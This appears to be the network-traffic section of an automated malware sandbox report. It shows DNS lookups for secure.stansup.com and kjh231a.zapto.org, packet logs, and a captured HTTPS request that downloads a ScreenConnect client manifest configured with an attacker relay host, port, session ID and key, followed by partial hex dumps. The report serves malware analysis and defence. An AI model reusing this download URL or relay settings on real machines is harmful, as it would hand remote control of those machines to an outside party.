                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.365291119 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.409976959 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.410001040 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.410111904 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.410152912 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.410197020 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.480557919 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.480578899 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.480650902 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.480685949 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.480746984 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.525602102 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.525620937 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.525687933 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.525712967 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.525747061 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.525769949 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.556834936 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.556854010 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.557081938 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.557101965 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.557256937 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.640837908 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.640887022 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.640984058 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.641024113 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.641088963 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.642174959 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.642189980 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.642262936 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.642277956 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.642329931 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.755820990 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.755852938 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.755973101 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.756016016 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.756083965 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.756870985 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.756889105 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.756943941 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.756964922 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.757014990 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.833570004 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.833600998 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.833656073 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.833688974 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.833717108 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.833739042 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.872024059 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.872051001 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.872109890 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.872153997 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.872185946 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.872209072 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.873029947 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.873050928 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.873106956 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.873131037 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.873156071 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.873176098 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.987111092 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.987139940 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.987332106 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.987360001 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.987426043 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.987529993 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.987548113 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.987596989 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.987611055 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.987674952 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.988924980 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.988941908 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.989007950 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.989022017 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.989074945 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:50.103811026 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:50.103838921 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:50.103935957 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:50.103975058 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:50.104028940 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:50.104480028 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:50.104505062 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:50.104545116 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:50.104559898 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:50.104588985 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:50.104612112 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:50.104731083 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:50.104768038 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:50.104795933 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:50.104815960 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:50.104841948 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:50.105156898 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:50.105220079 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:50.105273008 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.968599081 CEST497368041192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.973995924 CEST80414973679.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.974112034 CEST497368041192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:54.938801050 CEST497368041192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:54.944777966 CEST80414973679.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:55.182038069 CEST80414973679.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:55.204318047 CEST497368041192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:55.210238934 CEST80414973679.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:55.450802088 CEST80414973679.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:55.516299009 CEST497368041192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:57.263032913 CEST497368041192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:57.268748999 CEST80414973679.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:57.268842936 CEST497368041192.168.2.979.110.49.185

                                                                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:15.994709015 CEST6089253192.168.2.91.1.1.1
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:16.153800964 CEST53608921.1.1.1192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.623512030 CEST5437553192.168.2.91.1.1.1
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.800832987 CEST53543751.1.1.1192.168.2.9

                                                                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:15.994709015 CEST192.168.2.91.1.1.10x6662Standard query (0)secure.stansup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.623512030 CEST192.168.2.91.1.1.10x64b9Standard query (0)kjh231a.zapto.orgA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:16.153800964 CEST1.1.1.1192.168.2.90x6662No error (0)secure.stansup.com79.110.49.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:18.341581106 CEST1.1.1.1192.168.2.90x207dNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:18.341581106 CEST1.1.1.1192.168.2.90x207dNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:18.341581106 CEST1.1.1.1192.168.2.90x207dNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:18.341581106 CEST1.1.1.1192.168.2.90x207dNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:18.341581106 CEST1.1.1.1192.168.2.90x207dNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:18.341581106 CEST1.1.1.1192.168.2.90x207dNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:18.341581106 CEST1.1.1.1192.168.2.90x207dNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:18.341581106 CEST1.1.1.1192.168.2.90x207dNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:18.341581106 CEST1.1.1.1192.168.2.90x207dNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:20.101511002 CEST1.1.1.1192.168.2.90x1927No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:20.101511002 CEST1.1.1.1192.168.2.90x1927No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:22.485126019 CEST1.1.1.1192.168.2.90xcf97No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:22.485126019 CEST1.1.1.1192.168.2.90xcf97No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.800832987 CEST1.1.1.1192.168.2.90x64b9No error (0)kjh231a.zapto.org79.110.49.185A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                                                                        • secure.stansup.com

                                                                                                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        0192.168.2.94970779.110.49.1854431556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-10-25 17:27:17 UTC628OUTGET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=41bb451f-21e9-4165-b8b1-29146c1a400a&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session HTTP/1.1
                                                                                                                                                                                                                                                        Host: secure.stansup.com
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        2024-10-25 17:27:17 UTC250INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                        Content-Length: 118229
                                                                                                                                                                                                                                                        Content-Type: application/x-ms-application; charset=utf-8
                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                        Date: Fri, 25 Oct 2024 17:27:17 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-10-25 17:27:17 UTC16134INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 32 3d
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2=
                                                                                                                                                                                                                                                        2024-10-25 17:27:17 UTC16384INData Raw: 38 6b 4a 65 66 2f 65 72 76 39 41 49 70 57 49 67 4b 51 6e 49 38 43 47 2f 69 6e 41 69 68 4f 72 67 4b 35 33 74 41 44 34 6d 31 44 42 50 74 30 44 67 58 49 7a 54 67 46 2f 38 37 58 42 54 6c 30 6f 77 5a 34 4d 74 73 47 4a 35 4d 43 43 4b 68 4f 6e 51 69 57 6f 4f 51 49 75 46 34 44 43 55 70 7a 4a 41 6e 59 54 56 4d 4a 59 33 49 57 43 32 45 66 6e 67 77 71 57 79 4d 4e 72 6f 68 4e 44 76 56 58 56 41 35 53 5a 4a 6f 4f 4d 77 4f 39 44 74 4d 62 67 67 38 54 52 50 49 50 55 6c 52 38 45 41 47 6c 69 52 47 38 79 66 59 52 6f 64 77 71 45 6c 46 44 4c 68 4b 54 47 45 6b 53 6b 48 75 45 45 6c 4f 31 6d 42 49 59 67 77 51 54 4d 39 72 37 45 35 69 6e 4a 52 53 58 55 49 59 55 79 31 33 46 46 43 58 6b 4e 52 56 67 42 49 49 56 64 59 61 51 46 57 34 36 48 68 59 43 77 4a 63 57 48 61 72 43 46 67 30 41 33
                                                                                                                                                                                                                                                        Data Ascii: 8kJef/erv9AIpWIgKQnI8CG/inAihOrgK53tAD4m1DBPt0DgXIzTgF/87XBTl0owZ4MtsGJ5MCCKhOnQiWoOQIuF4DCUpzJAnYTVMJY3IWC2EfngwqWyMNrohNDvVXVA5SZJoOMwO9DtMbgg8TRPIPUlR8EAGliRG8yfYRodwqElFDLhKTGEkSkHuEElO1mBIYgwQTM9r7E5inJRSXUIYUy13FFCXkNRVgBIIVdYaQFW46HhYCwJcWHarCFg0A3
                                                                                                                                                                                                                                                        2024-10-25 17:27:17 UTC16384INData Raw: 42 6c 41 48 49 41 56 41 42 70 41 48 51 41 62 41 42 6c 41 41 4d 4e 41 41 42 49 51 77 42 76 41 47 34 41 64 41 42 79 41 47 38 41 62 41 42 51 41 47 45 41 62 67 42 6c 41 47 77 41 54 51 42 68 41 47 34 41 59 51 42 6e 41 47 55 41 51 77 42 68 41 48 41 41 64 41 42 31 41 48 49 41 5a 51 42 47 41 47 38 41 62 41 42 6b 41 47 55 41 63 67 42 55 41 47 6b 41 64 41 42 73 41 47 55 41 43 77 30 41 41 46 42 44 41 47 38 41 62 67 42 30 41 48 49 41 62 77 42 73 41 46 41 41 59 51 42 75 41 47 55 41 62 41 42 4e 41 47 45 41 62 67 42 68 41 47 63 41 5a 51 42 44 41 48 49 41 5a 51 42 6b 41 47 55 41 62 67 42 30 41 47 6b 41 59 51 42 73 41 48 4d 41 52 41 42 6c 41 48 4d 41 59 77 42 79 41 47 6b 41 63 41 42 30 41 47 6b 41 62 77 42 75 41 43 49 4e 41 41 42 45 51 77 42 76 41 47 34 41 64 41 42 79 41
                                                                                                                                                                                                                                                        Data Ascii: BlAHIAVABpAHQAbABlAAMNAABIQwBvAG4AdAByAG8AbABQAGEAbgBlAGwATQBhAG4AYQBnAGUAQwBhAHAAdAB1AHIAZQBGAG8AbABkAGUAcgBUAGkAdABsAGUACw0AAFBDAG8AbgB0AHIAbwBsAFAAYQBuAGUAbABNAGEAbgBhAGcAZQBDAHIAZQBkAGUAbgB0AGkAYQBsAHMARABlAHMAYwByAGkAcAB0AGkAbwBuACINAABEQwBvAG4AdAByA
                                                                                                                                                                                                                                                        2024-10-25 17:27:17 UTC16384INData Raw: 51 41 61 51 42 68 41 47 77 41 62 77 42 6e 41 45 4d 41 62 77 42 75 41 47 59 41 61 51 42 6e 41 48 55 41 63 67 42 6c 41 46 41 41 5a 51 42 79 41 47 30 41 61 51 42 7a 41 48 4d 41 61 51 42 76 41 47 34 41 51 67 42 31 41 48 51 41 64 41 42 76 41 47 34 41 56 41 42 6c 41 48 67 41 64 41 42 6b 4c 51 41 41 62 6b 30 41 59 51 42 6a 41 45 63 41 63 67 42 68 41 47 34 41 64 41 42 42 41 47 4d 41 59 77 42 6c 41 48 4d 41 63 77 42 70 41 47 49 41 61 51 42 73 41 47 6b 41 64 41 42 35 41 46 41 41 5a 51 42 79 41 47 30 41 61 51 42 7a 41 48 4d 41 61 51 42 76 41 47 34 41 63 77 42 45 41 47 6b 41 59 51 42 73 41 47 38 41 5a 77 42 55 41 47 55 41 65 41 42 30 41 45 4d 41 62 77 42 75 41 48 51 41 5a 51 42 75 41 48 51 41 52 67 42 76 41 48 49 41 62 51 42 68 41 48 51 41 65 79 30 41 41 45 35 4e 41
                                                                                                                                                                                                                                                        Data Ascii: QAaQBhAGwAbwBnAEMAbwBuAGYAaQBnAHUAcgBlAFAAZQByAG0AaQBzAHMAaQBvAG4AQgB1AHQAdABvAG4AVABlAHgAdABkLQAAbk0AYQBjAEcAcgBhAG4AdABBAGMAYwBlAHMAcwBpAGIAaQBsAGkAdAB5AFAAZQByAG0AaQBzAHMAaQBvAG4AcwBEAGkAYQBsAG8AZwBUAGUAeAB0AEMAbwBuAHQAZQBuAHQARgBvAHIAbQBhAHQAey0AAE5NA
                                                                                                                                                                                                                                                        2024-10-25 17:27:17 UTC16384INData Raw: 39 32 61 57 52 6c 63 67 46 65 51 32 68 76 62 33 4e 6c 49 48 52 6f 5a 53 42 30 62 32 39 73 49 48 56 7a 5a 57 51 67 64 47 38 67 63 32 56 73 5a 57 4e 30 49 47 45 67 63 6d 56 6e 61 57 39 75 49 47 39 6d 49 48 52 6f 5a 53 42 7a 59 33 4a 6c 5a 57 34 67 5a 6d 39 79 49 47 39 77 64 47 6c 6a 59 57 77 67 59 32 68 68 63 6d 46 6a 64 47 56 79 49 48 4a 6c 59 32 39 6e 62 6d 6c 30 61 57 39 75 49 43 68 50 51 31 49 70 4c 67 45 4c 55 32 56 73 5a 57 4e 30 49 46 52 76 62 32 77 42 50 45 4e 6f 62 32 39 7a 5a 53 42 33 61 47 6c 6a 61 43 42 73 62 32 64 76 62 69 42 7a 5a 58 4e 7a 61 57 39 75 49 48 52 76 49 47 4e 76 62 6e 52 79 62 32 77 67 62 32 34 67 64 47 68 6c 49 48 4a 6c 62 57 39 30 5a 53 42 74 59 57 4e 6f 61 57 35 6c 4c 67 45 55 55 32 56 73 5a 57 4e 30 49 45 78 76 5a 32 39 75 49
                                                                                                                                                                                                                                                        Data Ascii: 92aWRlcgFeQ2hvb3NlIHRoZSB0b29sIHVzZWQgdG8gc2VsZWN0IGEgcmVnaW9uIG9mIHRoZSBzY3JlZW4gZm9yIG9wdGljYWwgY2hhcmFjdGVyIHJlY29nbml0aW9uIChPQ1IpLgELU2VsZWN0IFRvb2wBPENob29zZSB3aGljaCBsb2dvbiBzZXNzaW9uIHRvIGNvbnRyb2wgb24gdGhlIHJlbW90ZSBtYWNoaW5lLgEUU2VsZWN0IExvZ29uI
                                                                                                                                                                                                                                                        2024-10-25 17:27:17 UTC16384INData Raw: 4f 76 65 72 72 69 64 65 2e 65 6e 2d 55 53 2e 72 65 73 6f 75 72 63 65 73 2d 2d 3e 3c 21 2d 2d 7a 73 72 76 76 67 45 41 41 41 43 52 41 41 41 41 62 46 4e 35 63 33 52 6c 62 53 35 53 5a 58 4e 76 64 58 4a 6a 5a 58 4d 75 55 6d 56 7a 62 33 56 79 59 32 56 53 5a 57 46 6b 5a 58 49 73 49 47 31 7a 59 32 39 79 62 47 6c 69 4c 43 42 57 5a 58 4a 7a 61 57 39 75 50 54 51 75 4d 43 34 77 4c 6a 41 73 49 45 4e 31 62 48 52 31 63 6d 55 39 62 6d 56 31 64 48 4a 68 62 43 77 67 55 48 56 69 62 47 6c 6a 53 32 56 35 56 47 39 72 5a 57 34 39 59 6a 63 33 59 54 56 6a 4e 54 59 78 4f 54 4d 30 5a 54 41 34 4f 53 4e 54 65 58 4e 30 5a 57 30 75 55 6d 56 7a 62 33 56 79 59 32 56 7a 4c 6c 4a 31 62 6e 52 70 62 57 56 53 5a 58 4e 76 64 58 4a 6a 5a 56 4e 6c 64 41 49 41 41 41 41 43 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                        Data Ascii: Override.en-US.resources-->...zsrvvgEAAACRAAAAbFN5c3RlbS5SZXNvdXJjZXMuUmVzb3VyY2VSZWFkZXIsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSNTeXN0ZW0uUmVzb3VyY2VzLlJ1bnRpbWVSZXNvdXJjZVNldAIAAAACAAAAAAAA
